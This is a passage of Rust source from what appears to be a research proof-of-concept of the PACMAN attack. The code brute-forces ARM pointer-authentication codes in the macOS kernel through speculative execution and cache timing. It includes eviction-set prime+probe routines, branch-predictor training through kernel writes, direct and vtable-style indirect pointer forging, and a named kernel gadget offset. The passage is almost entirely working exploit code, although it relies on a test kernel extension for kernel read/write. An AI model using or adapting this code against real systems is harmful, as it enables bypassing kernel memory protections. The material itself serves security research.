511 | pub unsafe fn forge_sign_data(&self, addr: u64, salt: u64) -> Result { 512 | let args : [u64; 2] = [addr, salt]; 513 | let mut output_cnt = 1; 514 | let mut output_val = 1; 515 | 516 | let kret = IOConnectCallScalarMethod( 517 | self.0, 518 | PacmanKitOp::ForgeSignData as u32, 519 | args.as_ptr(), 520 | 2, 521 | &mut output_val, 522 | &mut output_cnt 523 | ); 524 | 525 | if KERN_SUCCESS != kret { 526 | println!("Couldn't forge PACDA for addr 0x{:X} with salt 0x{:X}", addr, salt); 527 | return Err(kret); 528 | } 529 | 530 | return Ok(output_val); 531 | } 532 | 533 | /// Returns the correct AUTDA signature from the kernel. This can ONLY be used for testing! 534 | /// The real attack cannot do this. 535 | pub unsafe fn forge_auth_data(&self, addr: u64, salt: u64) -> Result { 536 | let args : [u64; 2] = [addr, salt]; 537 | let mut output_cnt = 1; 538 | let mut output_val = 1; 539 | 540 | let kret = IOConnectCallScalarMethod( 541 | self.0, 542 | PacmanKitOp::ForgeAuthData as u32, 543 | args.as_ptr(), 544 | 2, 545 | &mut output_val, 546 | &mut output_cnt 547 | ); 548 | 549 | if KERN_SUCCESS != kret { 550 | println!("Couldn't forge AUTDA for addr 0x{:X} with salt 0x{:X}", addr, salt); 551 | return Err(kret); 552 | } 553 | 554 | return Ok(output_val); 555 | } 556 | 557 | /// Returns the correct PACIA signature from the kernel. This can ONLY be used for testing! 558 | /// The real attack will need to use brute force to find this. We only use this method to learn 559 | /// the ground truth for generating plots and tuning the algorithm. 
560 | pub unsafe fn forge_sign_inst(&self, addr: u64, salt: u64) -> Result { 561 | let args : [u64; 2] = [addr, salt]; 562 | let mut output_cnt = 1; 563 | let mut output_val = 1; 564 | 565 | let kret = IOConnectCallScalarMethod( 566 | self.0, 567 | PacmanKitOp::ForgeSignInst as u32, 568 | args.as_ptr(), 569 | 2, 570 | &mut output_val, 571 | &mut output_cnt 572 | ); 573 | 574 | if KERN_SUCCESS != kret { 575 | println!("Couldn't forge PACIA for addr 0x{:X} with salt 0x{:X}", addr, salt); 576 | return Err(kret); 577 | } 578 | 579 | return Ok(output_val); 580 | } 581 | 582 | /// Returns the correct AUTIA signature from the kernel. This can ONLY be used for testing! 583 | /// The real attack cannot do this. 584 | pub unsafe fn forge_auth_inst(&self, addr: u64, salt: u64) -> Result { 585 | let args : [u64; 2] = [addr, salt]; 586 | let mut output_cnt = 1; 587 | let mut output_val = 1; 588 | 589 | let kret = IOConnectCallScalarMethod( 590 | self.0, 591 | PacmanKitOp::ForgeAuthInst as u32, 592 | args.as_ptr(), 593 | 2, 594 | &mut output_val, 595 | &mut output_cnt 596 | ); 597 | 598 | if KERN_SUCCESS != kret { 599 | println!("Couldn't forge AUTIA for addr 0x{:X} with salt 0x{:X}", addr, salt); 600 | return Err(kret); 601 | } 602 | 603 | return Ok(output_val); 604 | } 605 | 606 | /// Leak the current proc pointer 607 | pub unsafe fn current_proc(&self) -> Result { 608 | let mut leak_ptr : [u64; 1] = [0; 1]; 609 | let mut output_cnt = 1; 610 | let kret = IOConnectCallScalarMethod( 611 | self.0, 612 | PacmanKitOp::LeakCurProc as u32, 613 | core::ptr::null(), 614 | 0, 615 | leak_ptr.as_mut_ptr(), 616 | &mut output_cnt 617 | ); 618 | 619 | if KERN_SUCCESS != kret { 620 | println!("Couldn't call current_proc() (error {:?})", CStr::from_ptr(mach_error_string(kret))); 621 | return Err(kret); 622 | } 623 | 624 | return Ok(leak_ptr[0]); 625 | } 626 | } 627 | 628 | impl Drop for PacmanKitConnection { 629 | /** 630 | * Clean up our IOKit connection. 
631 | */ 632 | fn drop(&mut self) { 633 | println!("Dropping a PacmanKitConnection ({:X}, {:X})", self.0, self.1); 634 | unsafe { 635 | IOServiceClose(self.0); 636 | IOObjectRelease(self.1); 637 | } 638 | } 639 | } 640 | -------------------------------------------------------------------------------- /src/attacks/pacman.rs: -------------------------------------------------------------------------------- 1 | /*! 2 | * The PACMAN attack. 3 | */ 4 | use crate::*; 5 | use crate::pac::*; 6 | 7 | pub const DATA_EVSET_SIZE : usize = 12; 8 | pub const DATA_MISS_LATENCY : u64 = 42; // 42 for MSR timers 110 for multithreaded 9 | /// How many times to repeat a given trial? 10 | pub const DATA_NUM_ITERS : usize = 8; 11 | /// How many trials to run? (Each trial == a different PAC) 12 | pub const DATA_NUM_TRIALS : usize = 12; 13 | 14 | /// How many times do we iterate when inspecting the final set? 15 | /// this can be huge since there aren't going to be a ton of them ideally. 16 | pub const DATA_NUM_FINAL_ITERS : usize = 2048; 17 | 18 | /// How far above the first run's average does a run have to be to get marked "significant" for data 19 | pub const DATA_HOW_FAR_ABOVE_AVERAGE : f64 = 4f64; 20 | 21 | pub const INST_EVSET_SIZE : usize = 12; 22 | pub const INST_MISS_LATENCY : u64 = 60; // 70 for MSR timers (blr), 65/60 for MSR timers (blraa), 205 for multithreaded 23 | 24 | /// How many times to repeat a given trial? 25 | pub const INST_NUM_ITERS : usize = 8; 26 | /// How many trials to run? (Each trial == a different PAC) 27 | pub const INST_NUM_TRIALS : usize = 12; 28 | 29 | /// How many times do we iterate when inspecting the final set? 30 | /// this can be huge since there aren't going to be a ton of them ideally. 31 | pub const INST_NUM_FINAL_ITERS : usize = 2048; 32 | 33 | pub const LIMIT_EVSET_SIZE : usize = 512; 34 | 35 | /// How many bytes into the kernel mach-o does the target `ret` live? 
36 | // A gadget from IOSCSIArchitectureModelFamily.kext: 0x26a497c 37 | pub const INST_TARGET_OFFSET : u64 = 0x26a497c; // 0x15739C; // 0x15751C; // 0x154088 38 | 39 | /// How far above the first run's average does a run have to be to get marked "significant" for inst 40 | pub const INST_HOW_FAR_ABOVE_AVERAGE : f64 = 4f64; 41 | 42 | #[derive(Copy,Clone,Debug,PartialEq)] 43 | struct DirectTarget{ 44 | // The location of the pointer to forge a PAC for 45 | holder: u64, 46 | 47 | // A known correct value for holder- should point to something other than guess_ptr 48 | train_ptr: u64, 49 | 50 | // Current guess of the correct value for holder 51 | guess_ptr: u64, 52 | } 53 | 54 | #[derive(Copy,Clone,Debug,PartialEq)] 55 | struct IndirectTarget{ 56 | outer_holder: u64, 57 | inner_holder: u64, 58 | 59 | // Both of these are known correctly signed pointers 60 | // train_ptr causes execution to ignore inner_holder, guess_ptr causes execution to evaluate inner_holder 61 | outer_train_ptr: u64, 62 | outer_guess_ptr: u64, 63 | 64 | // Current guess of the correct value for inner_holder 65 | inner_guess_ptr: u64, 66 | } 67 | 68 | /// Direct or indirect? Used for abstracting direct/ indirect attacks into one generic method flavor. 69 | enum PacmanAttackTarget { 70 | Direct(DirectTarget), 71 | Indirect(IndirectTarget), 72 | } 73 | 74 | /** 75 | * Calculate a salt for a given PAC computation. 76 | * 77 | * # Arguments 78 | * * `holder_addr`: The address holding the PAC'd pointer. 79 | * * `salt_const`: The salt constant for a given object. 80 | * 81 | * # Return Value 82 | * Returns the correct 64 bit salt for this given context. 
83 | */ 84 | pub unsafe fn get_salt(holder_addr: u64, salt_const: u64) -> u64 { 85 | // Upper 16 bits are the salt_const 86 | // Need to make sure that bit 47 is set correctly too 87 | let addr_unmasked = (holder_addr | PAC_BITMASK) & (!0xFFFF000000000000u64); 88 | return (addr_unmasked | (salt_const << 48u64)); 89 | } 90 | 91 | /** 92 | * Helper method to do the address computation to find the victim object in memory, 93 | * given a IOService that owns an IOUserClient we want to corrupt. 94 | */ 95 | pub unsafe fn find_victim_objects(handle: &PacmanKitConnection) -> (u64, u64, u64, u64) { 96 | let victim_user_client = handle.get_handle_loc().unwrap(); 97 | let victim_object = victim_user_client + pacmankit::PACMANKIT_TO_HELPER; 98 | let victim_vtable = handle.kernel_read(victim_object).unwrap(); 99 | let victim_vtable_entry = handle.kernel_read(victim_vtable).unwrap(); 100 | 101 | return (victim_user_client, victim_object, victim_vtable, victim_vtable_entry); 102 | } 103 | 104 | /** 105 | Run the PACMAN attack on a given pointer and return the access latencies for analysis. 106 | 107 | This can be used on either a data pointer or instruction pointer. 108 | 109 | # Arguments 110 | * `handle`: A PacmanKitConnection handle (only used for kernel write). 111 | * `holder`: The address holding the pointer to forge (will be written into). 112 | * `known_good`: A known good pointer that can be safely used non-speculatively (has correct PAC). 113 | * `guess_value`: The pointer with a guessed PAC we are checking. 114 | * `time_use_fn`: The function to use for timing a pointer's usage. 115 | * `try_speculative`: A closure to trigger a speculative use of the pointer in `holder`. 116 | * `try_nonspeculative`: A closure to try using (for whatever definition of `using` applies 117 | in a given use case)the pointer in `holder` non-speculatively. 118 | * `forge_evset`: An eviction set for the `guess_value` pointer being forged. 
119 | * `forge_evset_indexes`: An array of indexes to use to index `forge_evset`. Will be randomized! 120 | * `limit_evset`: An eviction set for the `guess_value` pointer being forged. 121 | * `limit_evset_indexes`: An array of indexes to use to index `limit_evset`. Will be randomized! 122 | # Generics 123 | * `TrySpec`: A closure to try a value speculatively. Can just use `_`. 124 | * `TryNonSpec`: A closure to try a value non-speculatively. Can just use `_`. 125 | * `const` `EVSET_SIZE`: The size of the eviction set. 126 | 127 | # Return Value 128 | Returns the measured latencies (using `time_use_fn`) of the `prime+probe`'d eviction set. 129 | */ 130 | #[inline(always)] 131 | unsafe fn pacman_try_one( 132 | handle: &PacmanKitConnection, 133 | 134 | // Address of the pointer to forge (where the pointer will be saved in memory): 135 | holder: u64, 136 | 137 | // A known good value (can be used non-speculatively) that can be written into holder: 138 | known_good: u64, 139 | 140 | // The pointer we are guessing our PAC is correct for: 141 | guess_value: u64, 142 | 143 | // Generic functions to test the pointer: 144 | time_use_fn: unsafe fn(u64) -> u64, 145 | try_speculative: TrySpec, 146 | try_nonspeculative: TryNonSpec, 147 | 148 | // Eviction sets: 149 | forge_evset: &Vec, 150 | forge_evset_indexes: &mut Vec, 151 | limit_evset: &Vec, 152 | limit_evset_indexes: &mut Vec, 153 | ) -> [u64; EVSET_SIZE] where 154 | TrySpec: Fn(), TryNonSpec: Fn() { 155 | 156 | // 0. Throw off the prefetcher if you want (I found this was unnecessary) 157 | // forge_evset_indexes.shuffle(&mut thread_rng()); 158 | // limit_evset_indexes.shuffle(&mut thread_rng()); 159 | 160 | // 1. Train branch predictor on known good pointer 161 | handle.kernel_write(holder | PAC_BITMASK, known_good); 162 | for i in 0..12 { 163 | try_nonspeculative(); 164 | } 165 | 166 | // 2. Write guess 167 | handle.kernel_write(holder | PAC_BITMASK, guess_value); 168 | 169 | // 3. 
Evict LIMIT- this is ALWAYS a data access! 170 | for i in 0..limit_evset_indexes.len() { 171 | timer::time_access(limit_evset[limit_evset_indexes[i]]); 172 | } 173 | 174 | // 4. Prime the cache 175 | for i in 0..EVSET_SIZE { 176 | time_use_fn(forge_evset[forge_evset_indexes[i]]); 177 | } 178 | 179 | // 5. Try guess (speculatively) 180 | try_speculative(); 181 | 182 | // 6. Probe (go backwards with .rev() if you want to prevent self-eviction!) 183 | let mut times = [0; EVSET_SIZE]; 184 | for i in (0..EVSET_SIZE) { 185 | times[i] = time_use_fn(forge_evset[forge_evset_indexes[i]]); 186 | } 187 | 188 | // 7. Cleanup nicely 189 | handle.kernel_write(holder | PAC_BITMASK, known_good); 190 | 191 | return times; 192 | } 193 | 194 | /** 195 | * Does one run of a PACMAN trial where the pointer in question can be directly written to for a trial. 196 | * 197 | * This is in contrast to the indirect case where the pointer to test is in a region that 198 | * needs to be swapped (aka a vtable entry). 199 | * 200 | * See `pacman_try_one` and `pacman_differentiate_direct` for documentation on the interfaces exposed by this method. 201 | * This method is intended to be used as a helper routine for bruteforcing/ differentiating on direct gadgets (data or inst). 202 | */ 203 | #[inline(always)] 204 | unsafe fn pacman_direct< 205 | TrySpec, 206 | TryNonSpec, 207 | const NUM_ITERS: usize, 208 | const EVSET_SIZE: usize, 209 | const MISS_LATENCY: u64 210 | > ( 211 | handle: &PacmanKitConnection, 212 | holder: u64, 213 | 214 | // Used to train the branch predictor (non-speculatively!) 215 | train_ptr : u64, 216 | 217 | // Used speculatively as part of the PACMAN attack. Should point to different memory than `train_ptr`. 
218 | guess_ptr : u64, 219 | 220 | // Generic functions to test the pointer: 221 | time_use_fn: unsafe fn(u64) -> u64, 222 | try_speculative: TrySpec, 223 | try_nonspeculative: TryNonSpec, 224 | 225 | // Eviction sets: 226 | forge_evset: &Vec, 227 | forge_evset_indexes: &mut Vec, 228 | limit_evset: &Vec, 229 | limit_evset_indexes: &mut Vec, 230 | ) -> [u64; NUM_ITERS] where TrySpec: Fn(), TryNonSpec: Fn() { 231 | let mut samples = [0; NUM_ITERS]; 232 | 233 | for iteration in 0..NUM_ITERS { 234 | // Run a single test case 235 | let mut times = pacman_try_one::<_, _, EVSET_SIZE>( 236 | &handle, 237 | holder, 238 | train_ptr, 239 | guess_ptr, 240 | time_use_fn, 241 | &try_speculative, 242 | &try_nonspeculative, 243 | forge_evset, 244 | forge_evset_indexes, 245 | limit_evset, 246 | limit_evset_indexes, 247 | ); 248 | 249 | // Record the number of misses 250 | // @TODO: Replace samples with an array of buckets for different miss counts 251 | let mut misses = 0; 252 | for i in 0..EVSET_SIZE { 253 | if times[i] > MISS_LATENCY { 254 | misses += 1; 255 | } 256 | } 257 | samples[iteration] = misses; 258 | 259 | // Sometimes it's helpful to print the actual latencies out: 260 | // times.sort(); 261 | // println!("{:?}", times); 262 | } 263 | 264 | return samples; 265 | } 266 | 267 | /** 268 | * Does one run of a PACMAN trial where the pointer in question cannot be directly written to for a trial. 269 | * However, by writing to a different pointer we have a good signature for, we can control whether our guess pointer is evaluated speculatively. 270 | * 271 | * The quintessential example of when this might be useful is for forging vtables- we cannot copy good vtable entries from 272 | * the old vtable to put in our forged vtable as moving a signed pointer invalidates it (due to salts being address dependent). 273 | * 274 | * This becomes an indirect PACMAN gadget once we forge the correct data pointer used to point to our forged vtable. The following happens: 275 | * 276 | * 1. 
We update the forged vtable with our new guess. 277 | * 2. We swap the old vtable pointer for the forged one we got from a Direct PACMAN gadget. 278 | * 3. We speculatively use our new vtable with our guess entry, passing through the already-bruteforced pointer. 279 | * 280 | * The following diagram explains this: 281 | * 282 | * ```text 283 | * +--------------+ 284 | * +-> | Known Good | <- Train on this 285 | * | +--------------+ 286 | * +--------------+ | 287 | * | Outer Holder | -? Are we training or testing? 288 | * +--------------+ | 289 | * | +--------------+ 290 | * +-> | Inner Holder | <- Test on this 291 | * +--------------+ 292 | * ``` 293 | * 294 | * We load `outer_holder` with the value `outer_train_ptr`, which should cause the outer holder to point to an address 295 | * containing a known good pointer that can be dereferenced. In the context of C++ vtables, this means `outer_train_ptr` 296 | * is the appropriate signed pointer for `outer_holder` that points to the original object vtable. We train like this. 297 | * 298 | * During a test, we swap `outer_holder` for `outer_guess_ptr` which causes the outer holder to point to our guess value. 299 | * This should be a correctly signed pointer for outer holder! (Forge it using `pacman_direct`). In the context of C++ 300 | * vtables, this would be a data pointer we already forged pointing to our fake vtable. 301 | * 302 | * `inner_holder` is the address inside of the new memory region we want to bruteforce a pointer in. We will write our guess 303 | * of the new pointer into `inner_holder`. This guess does not need to be correct as it will only be evaluated speculatively 304 | * of course. `inner_guess_ptr` contains this guess value. In the C++ vtable example, this would point to our code gadget we'd 305 | * like to run, with a PAC guess in the upper bits. 306 | * 307 | * This is in contrast to the direct case where the pointer to test can just be trained on as we have a good pointer for that slot. 
308 | * 309 | * See `pacman_try_one` for documentation on the interfaces exposed by this method. 310 | * This method is intended to be used as a helper routine for bruteforcing/ differentiating on indirect gadgets (data or inst). 311 | */ 312 | #[inline(always)] 313 | unsafe fn pacman_indirect< 314 | TrySpec, 315 | TryNonSpec, 316 | const NUM_ITERS: usize, 317 | const EVSET_SIZE: usize, 318 | const MISS_LATENCY: u64 319 | > ( 320 | handle: &PacmanKitConnection, 321 | 322 | // The holders for our two pointers: 323 | outer_holder: u64, 324 | inner_holder: u64, 325 | 326 | // Used to train the branch predictor (non-speculatively!) 327 | outer_train_ptr : u64, 328 | outer_guess_ptr : u64, 329 | 330 | inner_guess_ptr: u64, 331 | 332 | // Generic functions to test the pointer: 333 | time_use_fn: unsafe fn(u64) -> u64, 334 | try_speculative: TrySpec, 335 | try_nonspeculative: TryNonSpec, 336 | 337 | // Eviction sets: 338 | forge_evset: &Vec, 339 | forge_evset_indexes: &mut Vec, 340 | limit_evset: &Vec, 341 | limit_evset_indexes: &mut Vec, 342 | ) -> [u64; NUM_ITERS] where TrySpec: Fn(), TryNonSpec: Fn() { 343 | let mut samples = [0; NUM_ITERS]; 344 | 345 | for iteration in 0..NUM_ITERS { 346 | // Write our guess into the inner holder 347 | handle.kernel_write(inner_holder, inner_guess_ptr); 348 | 349 | // Run a single test case, training with outer_holder set to outer_train_ptr 350 | // And then swapping to outer_guess_ptr when our test arrives (the caller should 351 | // ensure this causes inner_holder to be speculatively used). 
352 | let mut times = pacman_try_one::<_, _, EVSET_SIZE>( 353 | &handle, 354 | outer_holder, 355 | outer_train_ptr, 356 | outer_guess_ptr, 357 | time_use_fn, 358 | &try_speculative, 359 | &try_nonspeculative, 360 | forge_evset, 361 | forge_evset_indexes, 362 | limit_evset, 363 | limit_evset_indexes, 364 | ); 365 | 366 | // Record the number of misses 367 | // @TODO: Replace samples with an array of buckets for different miss counts 368 | let mut misses = 0; 369 | for i in 0..EVSET_SIZE { 370 | if times[i] > MISS_LATENCY { 371 | misses += 1; 372 | } 373 | } 374 | samples[iteration] = misses; 375 | 376 | // Sometimes it's helpful to print the actual latencies out: 377 | // times.sort(); 378 | // println!("{:?}", times); 379 | } 380 | 381 | return samples; 382 | } 383 | 384 | /** 385 | Attempt to differentiate a correct PAC vs incorrect PAC. 386 | 387 | This should be used before bruteforcing to ensure the parameters are configured correctly 388 | (incorrect PAC and correct PAC should have clearly different miss patterns produced by this function). 389 | 390 | This function also takes a third pointer (`train_ptr`) that is also correctly signed but points to **different** memory 391 | than either incorrect/ correct ptr. This pointer is used non-speculatively during training! 392 | 393 | This function will run the PACMAN attack on either a correct or incorrect pointer randomly and then print the results of the trial. 394 | The resulting data should produce different distributions for the two cases (correct or incorrect). 395 | 396 | This function works for direct cases (where the pointer being swapped out is the pointer under test) or indirect cases 397 | (where the pointer being tested lives within a new memory region we don't have a train ptr for (aka a vtable situation)). 398 | 399 | # Generic Arguments 400 | * `TrySpec`: A closure to try a value speculatively. Can just use `_`. 401 | * `TryNonSpec`: A closure to try a value non-speculatively. Can just use `_`. 
402 | * `NUM_TRIALS`: How many trials to run? Each trial is a grouping of `NUM_ITERS` calls to `pacman_try_one`. Each trial either uses a correct / incorrect pointer. 403 | * `NUM_ITERS`: How many times to test a given pointer (with `pacman_try_one`) before calling it quits? More == more accurate but takes longer. 404 | * `EVSET_SIZE`: How large of an eviction set should we use? 405 | * `MISS_LATENCY`: What timer reading constitutes a cache miss? 406 | 407 | # Arguments 408 | * `handle`: An open PacmanKitConnection handle (passed onto `pacman_try_one` for the arbitrary kernel write primitive). 409 | * `holder`: The address holding the pointer to forge (either `correct_ptr` or `incorrect_ptr` will be written here). `incorrect_ptr` will only be used speculatively. 410 | * `correct_ptr`: The correctly signed pointer to test. 411 | * `incorrect_ptr`: An incorrectly signed pointer to test. 412 | * `time_use_fn`: The function to use for timing a pointer's usage. 413 | * `try_speculative`: A closure to trigger a speculative use of the pointer in `holder`. 414 | * `try_nonspeculative`: A closure to try using (for whatever definition of `using` applies 415 | in a given use case)the pointer in `holder` non-speculatively. 416 | * `forge_evset`: An eviction set for the `guess_value` pointer being forged. 417 | * `forge_evset_indexes`: An array of indexes to use to index `forge_evset`. Will be randomized! 418 | * `limit_evset`: An eviction set for the `guess_value` pointer being forged. 419 | * `limit_evset_indexes`: An array of indexes to use to index `limit_evset`. Will be randomized! 
420 | */ 421 | unsafe fn pacman_differentiate< 422 | TrySpec, 423 | TryNonSpec, 424 | const NUM_TRIALS: usize, 425 | const NUM_ITERS: usize, 426 | const EVSET_SIZE: usize, 427 | const MISS_LATENCY: u64 428 | > ( 429 | handle: &PacmanKitConnection, 430 | 431 | // Either direct or indirect- this has all the info on our target object 432 | victim: PacmanAttackTarget, 433 | 434 | // We ignore the guess fields of the victim PacmanAttackTarget and instead defer to these: 435 | correct_ptr: u64, 436 | incorrect_ptr: u64, 437 | 438 | // Generic functions to test the pointer: 439 | time_use_fn: unsafe fn(u64) -> u64, 440 | try_speculative: TrySpec, 441 | try_nonspeculative: TryNonSpec, 442 | 443 | // Eviction sets: 444 | forge_evset: &Vec, 445 | forge_evset_indexes: &mut Vec, 446 | limit_evset: &Vec, 447 | limit_evset_indexes: &mut Vec, 448 | ) where TrySpec: Fn(), TryNonSpec: Fn() { 449 | // results[x][y] contains the number of misses observed for a given trial 450 | // x is the trial number, and y is the subtrial number 451 | // For a given x, we always do either correct or incorrect PAC according to use_correct_pac 452 | let mut results = [[0; NUM_ITERS]; NUM_TRIALS]; 453 | 454 | let mut use_correct_pac = [false; NUM_TRIALS]; 455 | for i in 0..NUM_TRIALS { 456 | use_correct_pac[i] = crandom::rand() % 2 == 0; 457 | } 458 | 459 | // Always ensure we get one false and one true 460 | use_correct_pac[0] = false; 461 | use_correct_pac[1] = true; 462 | 463 | for trial in 0..NUM_TRIALS { 464 | let value_to_use = if use_correct_pac[trial] {correct_ptr} else {incorrect_ptr}; 465 | 466 | let samples = match victim { 467 | PacmanAttackTarget::Direct(target) => 468 | pacman_direct::<_, _, NUM_ITERS, EVSET_SIZE, MISS_LATENCY>( 469 | &handle, 470 | target.holder, 471 | target.train_ptr, 472 | value_to_use, 473 | time_use_fn, 474 | &try_speculative, 475 | &try_nonspeculative, 476 | forge_evset, 477 | forge_evset_indexes, 478 | limit_evset, 479 | limit_evset_indexes 480 | ), 481 | 482 | 
PacmanAttackTarget::Indirect(target) => 483 | pacman_indirect::<_, _, NUM_ITERS, EVSET_SIZE, MISS_LATENCY>( 484 | &handle, 485 | target.outer_holder, 486 | target.inner_holder, 487 | 488 | target.outer_train_ptr, 489 | target.outer_guess_ptr, 490 | 491 | value_to_use, 492 | 493 | time_use_fn, 494 | &try_speculative, 495 | &try_nonspeculative, 496 | forge_evset, 497 | forge_evset_indexes, 498 | limit_evset, 499 | limit_evset_indexes 500 | ), 501 | }; 502 | 503 | results[trial] = samples; 504 | } 505 | 506 | // Post-process and print out results for graphing/ testing 507 | for i in 0..NUM_TRIALS { 508 | if use_correct_pac[i] { 509 | print!("[*] "); 510 | } 511 | else { 512 | print!("[x] "); 513 | } 514 | 515 | results[i].sort(); 516 | let mut avg : f64 = 0.0; 517 | let mut total : u64 = 0; 518 | for j in 0..results[i].len() { 519 | avg += results[i][j] as f64; 520 | total += results[i][j] 521 | } 522 | avg /= results[i].len() as f64; 523 | let median = results[i][results[i].len() / 2]; 524 | let max = results[i][results[i].len() - 2]; 525 | let min = results[i][2]; 526 | print!("{}, {}, {}, {}, {}\t", min, median, max, avg, total); 527 | println!("{:?}", results[i]); 528 | } 529 | } 530 | 531 | pub const HOW_FAR_ABOVE_AVERAGE : f64 = 4.0f64; 532 | 533 | unsafe fn pacman_bruteforce< 534 | TrySpec, 535 | TryNonSpec, 536 | const NUM_TRIALS: usize, 537 | const NUM_ITERS: usize, 538 | // Number of iterations to run on the potential matches to determine if they are good or not 539 | const NUM_FINAL_ITERS: usize, 540 | const EVSET_SIZE: usize, 541 | const MISS_LATENCY: u64 542 | > ( 543 | handle: &PacmanKitConnection, 544 | 545 | // All the information we need to know about the object under test 546 | victim: PacmanAttackTarget, 547 | 548 | // Generic functions to test the pointer: 549 | time_use_fn: unsafe fn(u64) -> u64, 550 | try_speculative: TrySpec, 551 | try_nonspeculative: TryNonSpec, 552 | 553 | // Eviction sets: 554 | forge_evset: &Vec, 555 | forge_evset_indexes: 
&mut Vec, 556 | limit_evset: &Vec, 557 | limit_evset_indexes: &mut Vec, 558 | ) -> Option where TrySpec: Fn(), TryNonSpec: Fn() { 559 | 560 | let mut NUM_MISS_SIGNIFICANT : f64 = 0.0; 561 | let mut potential_matches : Vec = Vec::new(); 562 | 563 | // Pull the target out of the victim object 564 | let forge_me = match victim { 565 | PacmanAttackTarget::Direct(target) => target.guess_ptr, 566 | PacmanAttackTarget::Indirect(target) => target.inner_guess_ptr, 567 | }; 568 | 569 | let mut num_trials_complete = 0; 570 | for pac_guess in pac::iterate_pacs(forge_me) { 571 | let value_to_use = pac_guess; 572 | 573 | let mut samples = match victim { 574 | PacmanAttackTarget::Direct(target) => 575 | pacman_direct::<_, _, NUM_ITERS, EVSET_SIZE, MISS_LATENCY>( 576 | &handle, 577 | target.holder, 578 | target.train_ptr, 579 | value_to_use, 580 | time_use_fn, 581 | &try_speculative, 582 | &try_nonspeculative, 583 | forge_evset, 584 | forge_evset_indexes, 585 | limit_evset, 586 | limit_evset_indexes 587 | ), 588 | 589 | PacmanAttackTarget::Indirect(target) => 590 | pacman_indirect::<_, _, NUM_ITERS, EVSET_SIZE, MISS_LATENCY>( 591 | &handle, 592 | target.outer_holder, 593 | target.inner_holder, 594 | 595 | target.outer_train_ptr, 596 | target.outer_guess_ptr, 597 | 598 | value_to_use, 599 | 600 | time_use_fn, 601 | &try_speculative, 602 | &try_nonspeculative, 603 | forge_evset, 604 | forge_evset_indexes, 605 | limit_evset, 606 | limit_evset_indexes 607 | ), 608 | }; 609 | 610 | // Parse results, add to potential_matches, potentially 611 | samples.sort(); 612 | let mut avg : f64 = 0.0; 613 | let mut total : u64 = 0; 614 | for j in 0..samples.len() { 615 | avg += samples[j] as f64; 616 | total += samples[j]; 617 | } 618 | avg /= (samples.len()) as f64; 619 | let median = samples[(samples.len()) / 2]; 620 | let min = samples[2]; 621 | 622 | if num_trials_complete == 0 { 623 | // @TODO: while the observed average isn't great, regenerate eviction set :) 624 | NUM_MISS_SIGNIFICANT = avg 
+ HOW_FAR_ABOVE_AVERAGE; 625 | 626 | if NUM_MISS_SIGNIFICANT > (EVSET_SIZE as f64) { 627 | println!("Asking for an impossibly high average, rounding down"); 628 | NUM_MISS_SIGNIFICANT = EVSET_SIZE as f64; 629 | } 630 | println!("The number to beat is {} misses", NUM_MISS_SIGNIFICANT); 631 | } 632 | 633 | // if pac_guess == correct_signed_new_vtable_ptr || num_trials_complete == 0 { 634 | // print!("{}, {}, {}, {}\t", min, median, avg, total); 635 | // println!("{:?}", samples); 636 | // } 637 | 638 | if (avg >= (NUM_MISS_SIGNIFICANT - (HOW_FAR_ABOVE_AVERAGE as f64 / 2.0)) as f64) { 639 | print!("{}, {}, {}, {}\t", min, median, avg, total); 640 | println!("{:?}", samples); 641 | println!("Found a potential match: 0x{:X}", pac_guess); 642 | potential_matches.push(pac_guess); 643 | } 644 | 645 | num_trials_complete+=1; 646 | 647 | if num_trials_complete % 6556 == 0 { 648 | println!("{}%...", (100 * num_trials_complete) / 65536); 649 | } 650 | } 651 | 652 | println!("Found {} potential matches", potential_matches.len()); 653 | 654 | if potential_matches.len() == 0 { 655 | return None; 656 | } 657 | 658 | // Track the total number of misses of every potential match 659 | // For the ones we think are potentially correct, record the value + total number of misses 660 | // Report the one with the most misses 661 | let mut final_matches : Vec<(u64, u64)> = Vec::new(); 662 | 663 | for potential_match in potential_matches { 664 | let value_to_use = potential_match; 665 | 666 | let mut samples = match victim { 667 | PacmanAttackTarget::Direct(target) => 668 | pacman_direct::<_, _, NUM_FINAL_ITERS, EVSET_SIZE, MISS_LATENCY>( 669 | &handle, 670 | target.holder, 671 | target.train_ptr, 672 | value_to_use, 673 | time_use_fn, 674 | &try_speculative, 675 | &try_nonspeculative, 676 | forge_evset, 677 | forge_evset_indexes, 678 | limit_evset, 679 | limit_evset_indexes 680 | ), 681 | 682 | PacmanAttackTarget::Indirect(target) => 683 | pacman_indirect::<_, _, NUM_FINAL_ITERS, 
EVSET_SIZE, MISS_LATENCY>( 684 | &handle, 685 | target.outer_holder, 686 | target.inner_holder, 687 | 688 | target.outer_train_ptr, 689 | target.outer_guess_ptr, 690 | 691 | value_to_use, 692 | 693 | time_use_fn, 694 | &try_speculative, 695 | &try_nonspeculative, 696 | forge_evset, 697 | forge_evset_indexes, 698 | limit_evset, 699 | limit_evset_indexes 700 | ), 701 | }; 702 | 703 | // Parse results, break if we found it 704 | samples.sort(); 705 | let mut avg : f64 = 0.0; 706 | let mut total : u64 = 0; 707 | for j in 0..samples.len() { 708 | avg += samples[j] as f64; 709 | total += samples[j]; 710 | } 711 | avg /= (samples.len()) as f64; 712 | let median = samples[(samples.len()) / 2]; 713 | let min = samples[2]; 714 | 715 | print!("{}, {}, {}, {}\t", min, median, avg, total); 716 | // println!("{:?}", samples); 717 | println!("Inspecting potential candidate: 0x{:X}", potential_match); 718 | 719 | if (avg >= NUM_MISS_SIGNIFICANT as f64) { 720 | final_matches.push((total, potential_match)); 721 | } 722 | } 723 | 724 | final_matches.sort_by_key(|k| k.0); 725 | println!("{:?}", final_matches); 726 | 727 | let final_pac = final_matches[final_matches.len() - 1].1; 728 | 729 | println!("Final answer: 0x{:X}", final_pac); 730 | return Some(final_pac); 731 | } 732 | 733 | /** 734 | * Data version of the PACMAN attack. 735 | * 736 | * # Bruteforce Mode 737 | * Returns the correct PAC that we found. 738 | * Note that currently that PAC is useless since the victim handle 739 | * drops when it goes out of scope (when we leave this fn). 
